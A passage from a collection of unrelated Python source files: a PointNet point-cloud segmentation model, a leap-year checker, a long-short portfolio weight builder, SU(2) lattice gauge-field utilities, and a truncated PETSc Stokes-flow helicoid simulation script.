scope='conv1', bn_decay=bn_decay)
net = tf_util.conv2d(net, 64, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv2', bn_decay=bn_decay)
with tf.variable_scope('transform_net2') as sc:
transform = feature_transform_net(net, is_training, bn_decay, K=64)
end_points['transform'] = transform
net_transformed = tf.matmul(tf.squeeze(net, axis=[2]), transform)
point_feat = tf.expand_dims(net_transformed, [2])
print(point_feat)
net = tf_util.conv2d(point_feat, 64, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv3', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv4', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv5', bn_decay=bn_decay)
global_feat = tf_util.max_pool2d(net, [num_point,1],
padding='VALID', scope='maxpool')
print(global_feat)
global_feat_expand = tf.tile(global_feat, [1, num_point, 1, 1])
concat_feat = tf.concat([point_feat, global_feat_expand], 3)
print(concat_feat)
net = tf_util.conv2d(concat_feat, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6', bn_decay=bn_decay)
net = tf_util.conv2d(net, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv8', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv9', bn_decay=bn_decay)
net = tf_util.conv2d(net, num_classes, [1,1],
padding='VALID', stride=[1,1], activation_fn=None,
scope='conv10')
net = tf.squeeze(net, [2]) # BxNxC
return net, end_points
def get_model_pyramid_fine_tune(pointnet_graph, point_cloud, point_coords_in_voxels, num_scale, is_training, num_classes, bn_decay=None):
""" Classification PointNet, input is BxNx3, output BxNx50 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
end_points['transform'] = pointnet_graph.get_tensor_by_name("transform_net2/Reshape_1:0")
points_feat1 = pointnet_graph.get_tensor_by_name("conv5/Relu:0")
print("points_feat1:", points_feat1)
# PYRAMID START #
# m x n x 1024
points_feat1 = tf.squeeze(points_feat1, [2])
print(points_feat1)
# m x n x (4 x 128 = 512)
points_feat1_concat = pyramid_nets.pyramid_convert_layer(points_feat1, point_coords_in_voxels, num_scale, [256], "Pyramid_1", bn=True, is_training = is_training, bn_decay = bn_decay)
print(points_feat1_concat)
# m x n x 1 x 512
points_feat1_concat = tf.expand_dims(points_feat1_concat, [2])
# Concat pyramid global and local features
points_feat1 = tf.expand_dims(points_feat1, [2])
point_feat_concat = tf.concat(axis=3, values=[points_feat1, points_feat1_concat])
# PYRAMID END #
net = tf_util.conv2d(point_feat_concat, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv8_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv9_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, num_classes, [1,1],
padding='VALID', stride=[1,1], activation_fn=None,
scope='conv10_pyramid')
net = tf.squeeze(net, [2]) # BxNxC
return net, end_points
def get_model_fine_tuing_evaluate(point_cloud, point_coords_in_voxels, num_scale, is_training, num_classes, bn_decay=None):
""" Classification PointNet, input is BxNx3, output BxNx50 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
with tf.variable_scope('transform_net1') as sc:
transform = input_transform_net(point_cloud, is_training, bn_decay, K=3)
point_cloud_transformed = tf.matmul(point_cloud, transform)
input_image = tf.expand_dims(point_cloud_transformed, -1)
net = tf_util.conv2d(input_image, 64, [1,3],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv1', bn_decay=bn_decay)
net = tf_util.conv2d(net, 64, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv2', bn_decay=bn_decay)
with tf.variable_scope('transform_net2') as sc:
transform = feature_transform_net(net, is_training, bn_decay, K=64)
end_points['transform'] = transform
net_transformed = tf.matmul(tf.squeeze(net, axis=[2]), transform)
point_feat = tf.expand_dims(net_transformed, [2])
print(point_feat)
net = tf_util.conv2d(point_feat, 64, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv3', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv4', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv5', bn_decay=bn_decay)
# PYRAMID START #
# m x n x 1024
net = tf.squeeze(net, [2])
print(net)
# m x n x (4 x 128 = 512)
points_feat1_concat = pyramid_nets.pyramid_convert_layer(net, point_coords_in_voxels, num_scale, [256], "Pyramid_1", bn=True, is_training = is_training, bn_decay = bn_decay)
print(points_feat1_concat)
# m x n x 1 x 512
points_feat1_concat = tf.expand_dims(points_feat1_concat, [2])
# Concat pyramid global and local features
net = tf.expand_dims(net, [2])
point_feat_concat = tf.concat(axis=3, values=[net, points_feat1_concat])
# PYRAMID END #
net = tf_util.conv2d(point_feat_concat, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv8_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv9_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, num_classes, [1,1],
padding='VALID', stride=[1,1], activation_fn=None,
scope='conv10_pyramid')
net = tf.squeeze(net, [2]) # BxNxC
return net, end_points
def get_model_multi_pyramid_fine_tune(pointnet_graph, point_cloud, point_coords_in_voxels, num_scale, is_training, num_classes, bn_decay=None):
""" Classification PointNet, input is BxNx3, output BxNx50 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
end_points['transform'] = pointnet_graph.get_tensor_by_name("transform_net2/Reshape_1:0")
points_feat1 = pointnet_graph.get_tensor_by_name("conv5/Relu:0")
print("points_feat1:", points_feat1)
# PYRAMID START #
# m x n x 1024
points_feat1 = tf.squeeze(points_feat1, [2])
print(points_feat1)
# m x n x (4 x 128 = 512)
points_feat1_concat = pyramid_nets.pyramid_convert_layer(points_feat1, point_coords_in_voxels, num_scale, [256], "Pyramid_1", bn=True, is_training = is_training, bn_decay = bn_decay)
print(points_feat1_concat)
# m x n x 1 x 512
points_feat1_concat = tf.expand_dims(points_feat1_concat, [2])
# Concat pyramid global and local features
points_feat1 = tf.expand_dims(points_feat1, [2])
point_feat_concat = tf.concat(axis=3, values=[points_feat1, points_feat1_concat])
# PYRAMID END #
net = tf_util.conv2d(point_feat_concat, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6_pyramid1', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7_pyramid1', bn_decay=bn_decay)
points_feat2= net
# PYRAMID START #
# m x n x 1024
points_feat2 = tf.squeeze(points_feat2, [2])
print(points_feat2)
# m x n x (4 x 128 = 512)
points_feat1_concat2 = pyramid_nets.pyramid_convert_layer(points_feat2, point_coords_in_voxels, num_scale, [128], "Pyramid_2", bn=True, is_training = is_training, bn_decay = bn_decay)
print(points_feat1_concat2)
# m x n x 1 x 512
points_feat1_concat2 = tf.expand_dims(points_feat1_concat2, [2])
# Concat pyramid global and local features
points_feat2 = tf.expand_dims(points_feat2, [2])
point_feat_concat2 = tf.concat(axis=3, values=[points_feat2, points_feat1_concat2])
# PYRAMID END #
net = tf_util.conv2d(point_feat_concat2, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6_pyramid2', bn_decay=bn_decay)
net = tf_util.conv2d(net, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7_pyramid2', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv8_pyramid2', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv9_pyramid2', bn_decay=bn_decay)
net = tf_util.conv2d(net, num_classes, [1,1],
padding='VALID', stride=[1,1], activation_fn=None,
scope='conv10_pyramid')
net = tf.squeeze(net, [2]) # BxNxC
return net, end_points
def get_loss(pred, label, end_points, reg_weight=0.001):
""" pred: BxNxC,
label: BxN, """
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=pred, labels=label)
classify_loss = tf.reduce_mean(loss)
tf.scalar_summary('classify loss', classify_loss)
# Enforce the transformation as orthogonal matrix
transform = end_points['transform'] # BxKxK
K = transform.get_shape()[1].value
mat_diff = tf.matmul(transform, tf.transpose(transform, perm=[0,2,1]))
mat_diff -= tf.constant(np.eye(K), dtype=tf.float32)
mat_diff_loss = tf.nn.l2_loss(mat_diff)
tf.scalar_summary('mat_loss', mat_diff_loss)
return classify_loss + mat_diff_loss * reg_weight
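# NOTE: the weighted get_loss below re-uses the same name and therefore
# shadows the definition above; only the (pred, label, smpw, end_points)
# variant is visible after the module is imported.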
def get_loss(pred, label, smpw, end_points):
""" pred: BxNxC,
label: BxN,
smpw: BxN """
classify_loss = tf.losses.sparse_softmax_cross_entropy(labels=label, logits=pred, weights=smpw)
tf.summary.scalar('classify loss', classify_loss)
tf.add_to_collection('losses', classify_loss)
return classify_loss
if __name__=='__main__':
with tf.Graph().as_default():
inputs = tf.zeros((32,1024,3))
outputs = get_model(inputs, tf.constant(True))
print(outputs)
|
py | 1a347eb33363b6cd606c90510b62b0758f55f4a4 | from datetime import date
print('ANO BISSEXTO')
ano = int(input('Digite um ano: '))
if ano == 0:
ano = date.today().year
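# Gregorian rule checked below: a year is a leap year when it is divisible
# by 4 and not by 100, or when it is divisible by 400.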
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print('É ano bissexto!')
else:
print('Não é ano bissexto!') |
py | 1a347ef518742a59be89302352511563234350ac | # -*- coding: utf-8 -*-
"""
Created on 2017-5-9
@author: cheng.li
"""
import numpy as np
from alphamind.utilities import group_mapping
from alphamind.utilities import simple_abssum
from alphamind.utilities import transform
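# long_short_builder turns a vector (or matrix) of expected returns into
# roughly dollar-neutral long/short weights: masked assets are zeroed out,
# the remaining scores are de-meaned, and the result is scaled so the
# absolute weights sum to `leverage` (per group when `groups` is supplied).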
def long_short_builder(er: np.ndarray,
leverage: float = 1.,
groups: np.ndarray = None,
masks: np.ndarray = None) -> np.ndarray:
er = er.copy()
if masks is not None:
er[masks] = 0.
er[~masks] = er[~masks] - er[~masks].mean()
if er.ndim == 1:
er = er.reshape((-1, 1))
if groups is None:
return er / simple_abssum(er, axis=0) * leverage
else:
groups = group_mapping(groups)
return transform(groups, er, 'scale', scale=leverage)
|
py | 1a347fbab992abc9d873866bd02f1fbff0f23b2d | """
Some tools to manipulate SU(2) gauge and adjoint scalar fields
"""
import tensorflow as tf
import numpy as np
# Generate Pauli matrices, using convention that 0th pauli matrix is the identity
def pauliMatrix(cpt):
if cpt == 0:
pauliMat = tf.constant([[1, 0], [0, 1]], dtype=tf.complex128)
elif cpt == 1:
pauliMat = tf.constant([[0, 1], [1, 0]], dtype=tf.complex128)
elif cpt == 2:
pauliMat = tf.constant([[0j, -1j], [1j, 0j]], dtype=tf.complex128)
elif cpt == 3:
pauliMat = tf.constant([[1, 0], [0, -1]], dtype=tf.complex128)
return pauliMat
# Generate an [N, N, N] field taking random values in the SU(2) Lie algebra.
def randomSu2LieAlgField(N):
matReal = tf.random.uniform([N, N, N, 2, 2], dtype=tf.float64)
matImag = tf.random.uniform([N, N, N, 2, 2], dtype=tf.float64)
mat = tf.complex(matReal, matImag)
trace = tf.linalg.trace(mat)
trace = tf.expand_dims(trace, -1)
trace = tf.expand_dims(trace, -1)
identity = tf.eye(2, batch_shape=[N, N, N], dtype=tf.complex128)
mat = mat - trace*identity
mat = 0.5*(mat + tf.linalg.adjoint(mat))
return mat
# Convert an [..., 3] vector field to an [..., 2, 2] field in the SU(2)
# Lie algebra. Equivalent to contraction with a vector field of Pauli matrices
def vecToSu2LieAlg(inputVectorField):
inputVectorField = tf.cast(inputVectorField, dtype=tf.complex128)
inputShape = tf.shape(inputVectorField)[0:-1]
outputShape = tf.concat([inputShape, [2, 2]], 0)
outputField = tf.zeros(outputShape, dtype=tf.complex128)
outputField += tf.expand_dims(
tf.expand_dims(inputVectorField[...,0], -1), -1
) * pauliMatrix(1)
outputField += tf.expand_dims(
tf.expand_dims(inputVectorField[...,1], -1), -1
) * pauliMatrix(2)
outputField += tf.expand_dims(
tf.expand_dims(inputVectorField[...,2], -1), -1
) * pauliMatrix(3)
return outputField
# Converts a [..., 3] vector field to a [..., 2, 2] SU(2) field
def vecToSu2(inputVectorField):
lieAlgField = vecToSu2LieAlg(inputVectorField)
return tf.linalg.expm(1j*lieAlgField)
# Converts a [..., 2, 2] SU(2) field to a [..., 3] SU(2) field
def su2ToVec(inputField):
latShape = tf.shape(inputField)[0:-2]
outputShape = tf.concat([latShape, [3]], 0)
zeroTol = 1e-15
cosVecNorm = 0.5*tf.math.real(tf.linalg.trace(inputField))
outputVec0 = tf.zeros(latShape, dtype=tf.float64)
outputVec1 = tf.zeros(latShape, dtype=tf.float64)
outputVec2 = tf.zeros(latShape, dtype=tf.float64)
vecNorm = tf.math.acos(cosVecNorm)
# This will clip vec values of +-pi to zero
outputVec0 = 0.5 * tf.math.divide_no_nan(vecNorm, tf.math.sin(vecNorm)) *\
tf.math.imag(tf.linalg.trace(inputField @ pauliMatrix(1)))
outputVec1 = 0.5 * tf.math.divide_no_nan(vecNorm, tf.math.sin(vecNorm)) *\
tf.math.imag(tf.linalg.trace(inputField @ pauliMatrix(2)))
outputVec2 = 0.5 * tf.math.divide_no_nan(vecNorm, tf.math.sin(vecNorm)) *\
tf.math.imag(tf.linalg.trace(inputField @ pauliMatrix(3)))
return tf.stack([outputVec0, outputVec1, outputVec2], -1)
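# The two conversions above rely on the identity
#   exp(i * theta * n.sigma) = cos(theta) * I + i * sin(theta) * (n.sigma)
# for a unit vector n, which is why su2ToVec recovers the vector norm as
# acos of half the real trace before rescaling the Pauli components.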
# Sets initial conditions for a single monopole at the origin with twisted
# boundary conditions. X, Y, Z are rank-3 tensors formed as the output of
# meshgrid; note that 'ij' indexing must be used to keep X and Y in the correct
# order.
def setMonopoleInitialConditions(X, Y, Z, vev):
latSize = tf.shape(X)
r = tf.math.sqrt(X**2 + Y**2 + Z**2)
higgsX = vev / np.sqrt(2) * X / r
higgsY = vev / np.sqrt(2) * Y / r
higgsZ = vev / np.sqrt(2) * Z / r
scalarMat = vecToSu2LieAlg(tf.stack([higgsX, higgsY, higgsZ], -1))
zeroMat = tf.zeros(latSize, dtype=tf.float64)
gaugeVec0 = tf.stack([zeroMat, Z / r**2, -Y / r**2], -1)
gaugeVec1 = tf.stack([-Z / r**2, zeroMat, X / r**2], -1)
gaugeVec2 = tf.stack([Y / r**2, -X / r**2, zeroMat], -1)
gaugeMat0 = vecToSu2(gaugeVec0)
gaugeMat1 = vecToSu2(gaugeVec1)
gaugeMat2 = vecToSu2(gaugeVec2)
gaugeMat = tf.stack([gaugeMat0, gaugeMat1, gaugeMat2], axis=-3)
return scalarMat, gaugeMat
# Sets initial conditions for an Electroweak sphaleron at the origin with periodic
# boundary conditions. X, Y, Z are rank-3 tensors formed as the output of
# meshgrid; note that 'ij' indexing must be used to keep X and Y in the correct
# order.
def setSphaleronInitialConditions(X, Y, Z, vev, gaugeCouping):
latSize = tf.shape(X)
r = tf.math.sqrt(X**2 + Y**2 + Z**2)
zeroMat = tf.zeros(latSize, dtype=tf.float64)
gaugeFn = 1/tf.math.cosh(vev*gaugeCouping*r/3)
higgsFn = tf.cast(tf.math.tanh(vev*gaugeCouping*r/3), tf.complex128)
higgsMat = 1/np.sqrt(2) * vev * tf.ones(latSize, dtype=tf.complex128) * higgsFn
higgsMat = tf.expand_dims(higgsMat, -1)
higgsMat = tf.expand_dims(higgsMat, -1)
isospinVecX = tf.stack([zeroMat, Z / r**2 * gaugeFn, -Y / r**2 * gaugeFn], -1)
isospinVecY = tf.stack([-Z / r**2 * gaugeFn, zeroMat, X / r**2 * gaugeFn], -1)
isospinVecZ = tf.stack([Y / r**2 * gaugeFn, -X / r**2 * gaugeFn, zeroMat], -1)
isospinMatX = vecToSu2(isospinVecX)
isospinMatY = vecToSu2(isospinVecY)
isospinMatZ = vecToSu2(isospinVecZ)
isospinMat = tf.stack([isospinMatX, isospinMatY, isospinMatZ], axis=-3)
hyperchargeMat = tf.ones(latSize, dtype=tf.complex128)
hyperchargeMat = tf.expand_dims(hyperchargeMat, -1)
hyperchargeMat = tf.expand_dims(hyperchargeMat, -1)
hyperchargeMat = tf.stack([hyperchargeMat, hyperchargeMat, hyperchargeMat], -3)
return higgsMat, isospinMat, hyperchargeMat
# Project a [..., 2, 2] Matrix field to the SU(2) Lie algebra.
def projectToSu2LieAlg(scalarField):
projectedField = scalarField
# Make antihermitian
projectedField = (0.5*(projectedField + \
tf.linalg.adjoint(projectedField)))
# Make traceless
trace = tf.linalg.trace(projectedField)
trace = tf.expand_dims(trace, -1)
trace = tf.expand_dims(trace, -1)
projectedField = (projectedField - 0.5*trace)
return projectedField
# Project a [..., 2, 2] Matrix field to the SU(2) Lie group.
# This has some array manipulation in to avoid big overheads with calculating
# determinants and inverses for 2 x 2 matrices using built-in functions
def projectToSu2(gaugeField):
projectedField = gaugeField
adjugate1 = tf.stack([gaugeField[...,1,1], -gaugeField[...,0,1]], -1)
adjugate2 = tf.stack([-gaugeField[...,1,0], gaugeField[...,0,0]], -1)
adjugate = tf.math.conj(tf.stack([adjugate1, adjugate2], -1))
# Make proportional to unitary matrix
determinant = gaugeField[...,0,0]*gaugeField[...,1,1] -\
gaugeField[...,0,1]*gaugeField[...,1,0]
determinant = tf.expand_dims(determinant, -1)
determinant = tf.expand_dims(determinant, -1)
projectedField = (0.5*(projectedField + \
adjugate))
# Normalise
determinant = projectedField[...,0,0]*projectedField[...,1,1] -\
projectedField[...,0,1]*projectedField[...,1,0]
determinant = tf.expand_dims(determinant, -1)
determinant = tf.expand_dims(determinant, -1)
projectedField = (projectedField / tf.math.sqrt(determinant))
return projectedField
# Project a [..., 1, 1] field to the U(1) Lie group
def projectToU1(gaugeField):
projectedField = gaugeField
# Normalise
magnitude = tf.abs(gaugeField)
projectedField = (projectedField / tf.cast(magnitude, tf.complex128))
return projectedField
# Remove the part of a gradient field that points away from the SU(2) manifold
def projectSu2Gradients(su2Gradients, su2Field):
trProduct = tf.linalg.trace(su2Gradients @ tf.linalg.adjoint(su2Field))
trProduct = tf.expand_dims(trProduct, -1)
trProduct = tf.expand_dims(trProduct, -1)
# print(tf.shape(trProduct))
projectedGradients = su2Gradients - 0.5*trProduct*su2Field
return projectedGradients
# Remove the part of a gradient field that points away from the U(1) manifold
def projectU1Gradients(u1Gradients, u1Field):
gradFieldProduct = u1Gradients @ tf.linalg.adjoint(u1Field)
# print(tf.shape(trProduct))
projectedGradients = u1Gradients - tf.cast(
tf.math.real(gradFieldProduct), tf.complex128
) @ u1Field
return projectedGradients
# Compute the inner product of two fields
# If trace is True, trace is taken before summing
# If adjoint is true, the first argument is hermitian conjugated
def innerProduct(field1, field2, tr=True, adj=False):
input1 = tf.linalg.adjoint(field1) if adj else field1
input2 = field2
productField = input1 @ input2
if tr:
productField = tf.linalg.trace(productField)
return tf.math.abs(tf.reduce_sum(productField))
# Linearly superpose two SU(2) gauge fields
def linearSuperpose(gaugeField1, gaugeField2):
# Convert matrices to vectors
vec1 = su2ToVec(gaugeField1)
vec2 = su2ToVec(gaugeField2)
# Add the vectors and output the corresponding SU(2) field
outputVec = vec1 + vec2
outputField = vecToSu2(outputVec)
return outputField
# Generate a constant SU(2) magnetic field of given direction and number of flux
# quanta. Assumes unitary gauge with scalar field parallel to pauli3
def constantMagneticField(X, Y, Z, fieldDir, numFluxQuanta):
coords = [X,Y,Z]
latShape = tf.shape(X)
zeroMat = tf.zeros(latShape, dtype=tf.float64)
flux = 4*np.pi*tf.cast(numFluxQuanta, tf.float64)
cpt1 = (fieldDir + 1) % 3
cpt2 = (fieldDir + 2) % 3
gaugeVecDir2 = 0.5*flux / (
tf.cast(latShape[cpt2]*latShape[cpt1], tf.float64)
) * coords[cpt1]
# Mask for sites on the cpt1 boundary
cpt1FaceShape = tf.tensor_scatter_nd_update(latShape, [[cpt1]], [1])
# cpt1FaceShape[cpt1] = 1
cpt1Mask = tf.ones(cpt1FaceShape, dtype=tf.float64)
paddings = [[0,0], [0,0], [0,0]]
paddings[cpt1] = [0, latShape[cpt1] - 1]
cpt1Mask = tf.pad(cpt1Mask, paddings, constant_values=0)
gaugeVecDir2 += cpt1Mask*0.5*flux / tf.cast(latShape[cpt2], tf.float64)
gaugeVecDir1 = zeroMat -\
0.5*cpt1Mask*coords[cpt2]*flux / tf.cast(latShape[cpt2], tf.float64)
gaugeCpts = [zeroMat, zeroMat, zeroMat]
gaugeCpts[fieldDir] = vecToSu2(tf.stack([zeroMat, zeroMat, zeroMat], -1))
gaugeCpts[cpt1] = vecToSu2(tf.stack([zeroMat, zeroMat, gaugeVecDir1], -1))
gaugeCpts[cpt2] = vecToSu2(tf.stack([zeroMat, zeroMat, gaugeVecDir2], -1))
return tf.stack(gaugeCpts, -3)
# Gets the indices of the sites on the boundary
def boundaryIndices(latShape, cpt, sign):
if sign == +1:
return sliceIndices(latShape, cpt, latShape[cpt] - 1)
else:
return sliceIndices(latShape, cpt, 0)
def sliceIndices(latShape, cpt, slicePosition):
indexVectors = [tf.range(latShape[0]), tf.range(latShape[1]), tf.range(latShape[2])]
indexVectors[cpt] = slicePosition
indices = tf.stack(tf.meshgrid(indexVectors[0], indexVectors[1], indexVectors[2], indexing="ij"), -1)
return indices |
py | 1a3480d452cba819453dc72ce0911c8a4b11b71d | import sys
import petsc4py
petsc4py.init(sys.argv)
import numpy as np
import pickle
# from time import time
# from scipy.io import loadmat
# from src.stokes_flow import problem_dic, obj_dic
# from src.geo import *
from petsc4py import PETSc
from src import stokes_flow as sf
from src.myio import *
from src.objComposite import *
# from src.myvtk import *
# from src.support_class import *
from codeStore import helix_common
def get_problem_kwargs(**main_kwargs):
problem_kwargs = get_solver_kwargs()
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'helicoid_strain_rate')
OptDB.setValue('f', fileHandle)
problem_kwargs['fileHandle'] = fileHandle
dumb_d = OptDB.getReal('dumb_d', 5)
problem_kwargs['dumb_d'] = dumb_d
dumb_theta = OptDB.getReal('dumb_theta', np.pi / 3)
problem_kwargs['dumb_theta'] = dumb_theta
kwargs_list = (get_helicoid_kwargs(), get_sphere_kwargs(),
get_forcefree_kwargs(), main_kwargs,)
for t_kwargs in kwargs_list:
for key in t_kwargs:
problem_kwargs[key] = t_kwargs[key]
return problem_kwargs
def print_case_info(**problem_kwargs):
fileHandle = problem_kwargs['fileHandle']
print_solver_info(**problem_kwargs)
print_forcefree_info(**problem_kwargs)
print_sphere_info(fileHandle, **problem_kwargs)
dumb_d = problem_kwargs['dumb_d']
dumb_theta = problem_kwargs['dumb_theta']
PETSc.Sys.Print(' dumb_d: %f, dumb_theta: %f' % (dumb_d, dumb_theta))
print_helicoid_info(**problem_kwargs)
return True
def do_solve_base_flow(basei, problem, obj_comp, uw_Base_list, sumFT_Base_list):
problem.set_basei(basei)
problem.create_F_U()
problem.solve()
PETSc.Sys.Print('---> basei %d' % basei)
PETSc.Sys.Print(obj_comp.get_total_force())
ref_U = obj_comp.get_ref_U()
PETSc.Sys.Print('ref_u: %f %f %f' % (ref_U[0], ref_U[1], ref_U[2]))
PETSc.Sys.Print('ref_w: %f %f %f' % (ref_U[3], ref_U[4], ref_U[5]))
uw_Base_list.append(obj_comp.get_ref_U())
sumFT_Base_list.append(obj_comp.get_total_force())
return uw_Base_list, sumFT_Base_list
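# The helper above solves the force/torque-free problem for one base-flow
# index `basei` and records the rigid-body response (ref_U) and the total
# force/torque; do_solve_base_flow_iter below is the same loop body but uses
# the iterative solver (do_iterate3) instead of a direct solve().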
def do_solve_base_flow_iter(basei, problem, obj_comp, uw_Base_list, sumFT_Base_list):
problem.set_basei(basei)
problem.create_F_U()
problem.do_iterate3()
PETSc.Sys.Print('---> basei %d' % basei)
PETSc.Sys.Print(obj_comp.get_total_force())
ref_U = obj_comp.get_ref_U()
PETSc.Sys.Print('ref_u: %f %f %f' % (ref_U[0], ref_U[1], ref_U[2]))
PETSc.Sys.Print('ref_w: %f %f %f' % (ref_U[3], ref_U[4], ref_U[5]))
uw_Base_list.append(obj_comp.get_ref_U())
sumFT_Base_list.append(obj_comp.get_total_force())
return uw_Base_list, sumFT_Base_list
# @profile
def main_fun(**main_kwargs):
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'helicoid_strain_rate')
OptDB.setValue('f', fileHandle)
main_kwargs['fileHandle'] = fileHandle
field_range = np.array([[-3, -3, -3], [3, 3, 3]])
n_grid = np.array([1, 1, 1]) * OptDB.getInt('n_grid', 10)
main_kwargs['field_range'] = field_range
main_kwargs['n_grid'] = n_grid
main_kwargs['region_type'] = 'rectangle'
problem_kwargs = get_problem_kwargs(**main_kwargs)
# matrix_method = problem_kwargs['matrix_method']
# pickProblem = problem_kwargs['pickProblem']
# fileHandle = problem_kwargs['fileHandle']
# save_vtk = problem_kwargs['save_vtk']
problem_kwargs['basei'] = 1
problem_kwargs['zoom_factor'] = 1
if not problem_kwargs['restart']:
print_case_info(**problem_kwargs)
helicoid_comp = create_helicoid_comp(namehandle='helicoid', **problem_kwargs)
problem = sf.StrainRateBaseForceFreeProblem(**problem_kwargs)
problem.add_obj(helicoid_comp)
problem.print_info()
problem.create_matrix()
uw_Base_list = []
sumFT_Base_list = []
# passive cases
for basei in (0, 1, 2, 3, 4, 5, 6, 7, 8):
uw_Base_list, sumFT_Base_list = do_solve_base_flow(basei, problem, helicoid_comp,
uw_Base_list, sumFT_Base_list)
# active case
helicoid_comp.set_rel_U_list([np.zeros(6), ] * len(helicoid_comp.get_obj_list()))
basei = 9
uw_Base_list, sumFT_Base_list = do_solve_base_flow(basei, problem, helicoid_comp,
uw_Base_list, sumFT_Base_list)
pickle_dict = {'problem_kwargs': problem_kwargs,
'u_nodes': helicoid_comp.get_u_nodes(),
'f_nodes': helicoid_comp.get_f_nodes(),
'uw_Base_list': uw_Base_list,
'sumFT_Base_list': sumFT_Base_list, }
with open('%s.pickle' % fileHandle, 'wb') as handle:
pickle.dump(pickle_dict, handle, protocol=4)
PETSc.Sys.Print('save table_data to %s.pickle' % fileHandle)
return True
def main_fun_E(**main_kwargs):
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'helicoid_strain_rate')
OptDB.setValue('f', fileHandle)
main_kwargs['fileHandle'] = fileHandle
field_range = np.array([[-3, -3, -3], [3, 3, 3]])
n_grid = np.array([1, 1, 1]) * OptDB.getInt('n_grid', 10)
main_kwargs['field_range'] = field_range
main_kwargs['n_grid'] = n_grid
main_kwargs['region_type'] = 'rectangle'
problem_kwargs = get_problem_kwargs(**main_kwargs)
# matrix_method = problem_kwargs['matrix_method']
# pickProblem = problem_kwargs['pickProblem']
# fileHandle = problem_kwargs['fileHandle']
# save_vtk = problem_kwargs['save_vtk']
problem_kwargs['basei'] = 1
problem_kwargs['zoom_factor'] = 1
if not problem_kwargs['restart']:
print_case_info(**problem_kwargs)
helicoid_comp = create_helicoid_comp(namehandle='helicoid', **problem_kwargs)
problem = sf.StrainRateBaseForceFreeProblem(**problem_kwargs)
problem.add_obj(helicoid_comp)
problem.print_info()
problem.create_matrix()
uw_Base_list = []
sumFT_Base_list = []
# passive cases
for basei in (1, 2, 3, 4, 5):
uw_Base_list, sumFT_Base_list = do_solve_base_flow(basei, problem, helicoid_comp,
uw_Base_list, sumFT_Base_list)
return True
def main_fun_dumb_E(**main_kwargs):
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'dumb_strain_rate')
OptDB.setValue('f', fileHandle)
main_kwargs['fileHandle'] = fileHandle
# field_range = np.array([[-3, -3, -3], [3, 3, 3]])
# n_grid = np.array([1, 1, 1]) * OptDB.getInt('n_grid', 10)
# main_kwargs['field_range'] = field_range
# main_kwargs['n_grid'] = n_grid
# main_kwargs['region_type'] = 'rectangle'
problem_kwargs = get_problem_kwargs(**main_kwargs)
# matrix_method = problem_kwargs['matrix_method']
# pickProblem = problem_kwargs['pickProblem']
# fileHandle = problem_kwargs['fileHandle']
# save_vtk = problem_kwargs['save_vtk']
problem_kwargs['basei'] = 1
problem_kwargs['zoom_factor'] = 1
